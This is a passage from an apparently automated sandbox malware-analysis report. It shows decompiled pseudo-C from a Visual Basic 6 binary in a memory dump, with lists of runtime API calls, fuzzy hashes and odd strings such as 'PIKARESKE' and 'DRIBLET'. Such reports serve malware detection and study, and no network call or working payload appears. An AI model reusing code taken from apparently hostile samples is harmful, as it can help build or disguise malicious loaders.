        						L0040135E();
        					}
        					_t53 = _v40;
        					_v48 = _t53;
        					_v56 = 9;
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_push(0);
        					_push(_v28);
        					_v40 = 0;
        					asm("movsd");
        					L00401346();
        					L0040133A();
        				}
        				_v32 = 0x4b3f9744;
        				asm("wait");
        				_push(0x433e5f);
        				L00401358();
        				return _t53;
        			}

        APIs
        • #628.MSVBVM60(FGFG,00000001,?), ref: 00433D03
        • __vbaStrMove.MSVBVM60(FGFG,00000001,?), ref: 00433D0D
        • __vbaStrCmp.MSVBVM60(00431DBC,00000000,FGFG,00000001,?), ref: 00433D18
        • __vbaFreeStr.MSVBVM60(00431DBC,00000000,FGFG,00000001,?), ref: 00433D2A
        • __vbaFreeVar.MSVBVM60(00431DBC,00000000,FGFG,00000001,?), ref: 00433D32
        • __vbaNew2.MSVBVM60(00431AD4,00435448,00431DBC,00000000,FGFG,00000001,?), ref: 00433D52
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00431AC4,00000044), ref: 00433DFC
        • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 00433E21
        • __vbaFreeVar.MSVBVM60(?,00000000), ref: 00433E29
        • __vbaFreeObj.MSVBVM60(00433E5F,00431DBC,00000000,FGFG,00000001,?), ref: 00433E59
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355935745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2355931397.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000006.00000002.2355957257.0000000000435000.00000004.00020000.sdmp
        • Associated: 00000006.00000002.2355962315.0000000000436000.00000002.00020000.sdmp
        Similarity
        • API ID: __vba$Free$#628CheckHresultLateMoveNew2
        • String ID: FGFG$PIKARESKE
        • API String ID: 3824332664-2650081475
        • Opcode ID: 77e8c23a56f3dfa3181d7ab9cdb504912c58e7fc8d620e10da562716eb3cd2b6
        • Instruction ID: d98d35cbb471d84565928b9a09efd14cd1a1e19f47451809068ca4918d836913
        • Opcode Fuzzy Hash: 77e8c23a56f3dfa3181d7ab9cdb504912c58e7fc8d620e10da562716eb3cd2b6
        • Instruction Fuzzy Hash: FD515EB1C016089BDF10EFAAC9826DEBBB5FF09704F60416EE905BB291C7751A098F95
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 68%
        			E00434221(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a12) {
        				char _v8;
        				intOrPtr _v12;
        				intOrPtr* _v16;
        				char _v28;
        				char _v32;
        				char _v36;
        				intOrPtr _v44;
        				char _v52;
        				signed int _t26;
        				char* _t33;
        				intOrPtr* _t40;
        				void* _t47;
        				void* _t49;
        				intOrPtr _t50;
        				intOrPtr* _t51;
        
        				_t50 = _t49 - 0xc;
        				 *[fs:0x0] = _t50;
        				_t51 = _t50 - 0x38;
        				_v16 = _t51;
        				_v12 = 0x4011e0;
        				_v8 = 0;
        				_t40 = _a4;
        				 *((intOrPtr*)( *_t40 + 4))(_t40, __edi, __esi, __ebx,  *[fs:0x0], 0x401226, _t47);
        				_v28 = 0;
        				_v32 = 0;
        				_v36 = 0;
        				_v52 = 0;
        				L00401334();
        				L00401334();
        				_t26 =  &_v52;
        				_push(_t26);
        				_push(1);
        				_v44 = 0x20;
        				_v52 = 2;
        				L004012CE();
        				L0040136A();
        				_push(_t26);
        				_push(0x431de4);
        				L00401352();
        				asm("sbb esi, esi");
        				L0040134C();
        				_t33 =  &_v52;
        				L0040133A();
        				if( ~( ~( ~_t26)) != 0) {
        					L004012D4();
        					 *_t51 =  *0x4011d4;
        					 *_t51 =  *0x4011d0;
        					 *_t51 =  *0x4011cc;
        					 *_t51 =  *0x4011c8;
        					_t26 =  *((intOrPtr*)( *_t40 + 0x2c8))(_t40, 6, _t33, _t33, _t33, _t33, _t26);
        					asm("fclex");
        					if(_t26 < 0) {
        						_push(0x2c8);
        						_push(0x431620);
        						_push(_t40);
        						_push(_t26);
        						L0040135E();
        					}
        				}
        				asm("wait");
        				_push(0x434347);
        				L0040134C();
        				L0040134C();
        				return _t26;
        			}

        APIs
        • __vbaStrCopy.MSVBVM60 ref: 0043426A
        • __vbaStrCopy.MSVBVM60 ref: 00434275
        • #606.MSVBVM60(00000001,?), ref: 0043428E
        • __vbaStrMove.MSVBVM60(00000001,?), ref: 00434298
        • __vbaStrCmp.MSVBVM60(00431DE4,00000000,00000001,?), ref: 004342A3
        • __vbaFreeStr.MSVBVM60(00431DE4,00000000,00000001,?), ref: 004342B5
        • __vbaFreeVar.MSVBVM60(00431DE4,00000000,00000001,?), ref: 004342BD
        • __vbaFpI4.MSVBVM60(00431DE4,00000000,00000001,?), ref: 004342CF
        • __vbaHresultCheckObj.MSVBVM60(00000000,004011E0,00431620,000002C8,?,?,?,?,00000000,00431DE4,00000000,00000001,?), ref: 00434318
        • __vbaFreeStr.MSVBVM60(00434347,00431DE4,00000000,00000001,?), ref: 00434339
        • __vbaFreeStr.MSVBVM60(00434347,00431DE4,00000000,00000001,?), ref: 00434341
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355935745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2355931397.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000006.00000002.2355957257.0000000000435000.00000004.00020000.sdmp
        • Associated: 00000006.00000002.2355962315.0000000000436000.00000002.00020000.sdmp
        Similarity
        • API ID: __vba$Free$Copy$#606CheckHresultMove
        • String ID:
        • API String ID: 4172741608-3916222277
        • Opcode ID: 5a8043274ec3f35f8914c9c38057d1c332d5f91f4621789a174cae3af2a671c0
        • Instruction ID: 1d905b4b87bd3e13d6c320388fdb852331afa8df3d2e0882f6927c9798857272
        • Opcode Fuzzy Hash: 5a8043274ec3f35f8914c9c38057d1c332d5f91f4621789a174cae3af2a671c0
        • Instruction Fuzzy Hash: DA317C70900209EBDB10EF92DC86AEEBBB8FF08704F10412EF951B71A1DB382505CB99
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • __vbaStrCopy.MSVBVM60 ref: 004343C1
        • __vbaVarTstNe.MSVBVM60(?,?), ref: 004343FB
        • __vbaVarDup.MSVBVM60(?,?), ref: 00434451
        • #596.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 00434475
        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0043447F
        • __vbaFreeVarList.MSVBVM60(00000007,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004344A5
        • __vbaFreeStr.MSVBVM60(004344EF,?,?), ref: 004344E1
        • __vbaFreeStr.MSVBVM60(004344EF,?,?), ref: 004344E9
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355935745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2355931397.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000006.00000002.2355957257.0000000000435000.00000004.00020000.sdmp
        • Associated: 00000006.00000002.2355962315.0000000000436000.00000002.00020000.sdmp
        Similarity
        • API ID: __vba$Free$#596CopyListMove
        • String ID: DRIBLET
        • API String ID: 2863382718-2417547119
        • Opcode ID: 43c4fdf18efe43b910ad062fa694b2d6db2f07971848099055bbdb5409d67634
        • Instruction ID: f4f6b0e92a3e2a98d954c24b7ec6cbc03208748010ff71db245f44bdaa6ba199
        • Opcode Fuzzy Hash: 43c4fdf18efe43b910ad062fa694b2d6db2f07971848099055bbdb5409d67634
        • Instruction Fuzzy Hash: 004152B2D0025CAEDB51DFA4D881BDEBBF8BB08304F5041ABE509F7251EB7466888F55
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • __vbaStrCopy.MSVBVM60 ref: 0043454E
        • #573.MSVBVM60(?,?), ref: 00434568
        • __vbaVarTstNe.MSVBVM60(?,?,?,?), ref: 00434583
        • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?), ref: 00434595
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401208,00431620,00000084), ref: 004345C8
        • __vbaFreeStr.MSVBVM60(004345F5), ref: 004345EF
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355935745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2355931397.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000006.00000002.2355957257.0000000000435000.00000004.00020000.sdmp
        • Associated: 00000006.00000002.2355962315.0000000000436000.00000002.00020000.sdmp
        Similarity
        • API ID: __vba$Free$#573CheckCopyHresultList
        • String ID: K
        • API String ID: 3527455153-856455061
        • Opcode ID: ade23463541412b13f15e85aef0a5dbee96b6d94cab8b2f6ce44c503c39c7c2f
        • Instruction ID: 7bf7b360825444399c271af599b7ab2a017e0903124318ae056307419602d92d
        • Opcode Fuzzy Hash: ade23463541412b13f15e85aef0a5dbee96b6d94cab8b2f6ce44c503c39c7c2f
        • Instruction Fuzzy Hash: 9E2126B1C00208ABCB00EF95C885ADEFBBCAF48704F10512BE505B7291D778A5848BA9
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • __vbaNew2.MSVBVM60(00431AD4,00435448,?,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 00434071
        • __vbaHresultCheckObj.MSVBVM60(00000000,0024F6F4,00431AC4,00000014), ref: 00434095
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00431AE4,000000E0), ref: 004340BE
        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 004340CC
        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 004340D4
        • __vbaFreeStr.MSVBVM60(00434101), ref: 004340FB
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355935745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2355931397.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000006.00000002.2355957257.0000000000435000.00000004.00020000.sdmp
        • Associated: 00000006.00000002.2355962315.0000000000436000.00000002.00020000.sdmp
        Similarity
        • API ID: __vba$CheckFreeHresult$MoveNew2
        • String ID: td
        • API String ID: 2347022188-1079315276
        • Opcode ID: f06fcd3b49271363e8226d4cbc401ff751421c2f9b0e85f1011ed9437727f03d
        • Instruction ID: a4956402939807ec5e5ef22778d0a31415ccaeecceb8b317b30c2d63959e849a
        • Opcode Fuzzy Hash: f06fcd3b49271363e8226d4cbc401ff751421c2f9b0e85f1011ed9437727f03d
        • Instruction Fuzzy Hash: E2214170E40604ABCB14EFA5C845EEEFBF8FF98704F24545AE501B72A0C77869418BA9
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 00433ECD
        • #612.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 00433ED6
        • __vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 00433EDF
        • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 00433EE9
        • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401226), ref: 00433EF1
        • __vbaFreeStr.MSVBVM60(00433F1E,?,?), ref: 00433F10
        • __vbaFreeStr.MSVBVM60(00433F1E,?,?), ref: 00433F18
        Memory Dump Source
        • Source File: 00000006.00000002.2355935745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2355931397.0000000000400000.00000002.00020000.sdmp
        • Associated: 00000006.00000002.2355957257.0000000000435000.00000004.00020000.sdmp
        • Associated: 00000006.00000002.2355962315.0000000000436000.00000002.00020000.sdmp
        Similarity
        • API ID: __vba$Free$Move$#612Copy
        • String ID:
        • API String ID: 672936406-0
        • Opcode ID: 9221ade140e710741bedebee5bf74f0748fbd47e7a864519dde6df037f916f73
        • Instruction ID: 4bfb11ec3929a9bd519f12f7881e68727b2329f7a2d0323a2f4c24461b2d9609
        • Opcode Fuzzy Hash: 9221ade140e710741bedebee5bf74f0748fbd47e7a864519dde6df037f916f73
        • Instruction Fuzzy Hash: CB110C75C10219ABCB00EFE5D9869EEBBB8BF08704F40406FF501B3691DB786A05CB99
        Uniqueness

        Uniqueness Score: -1.00%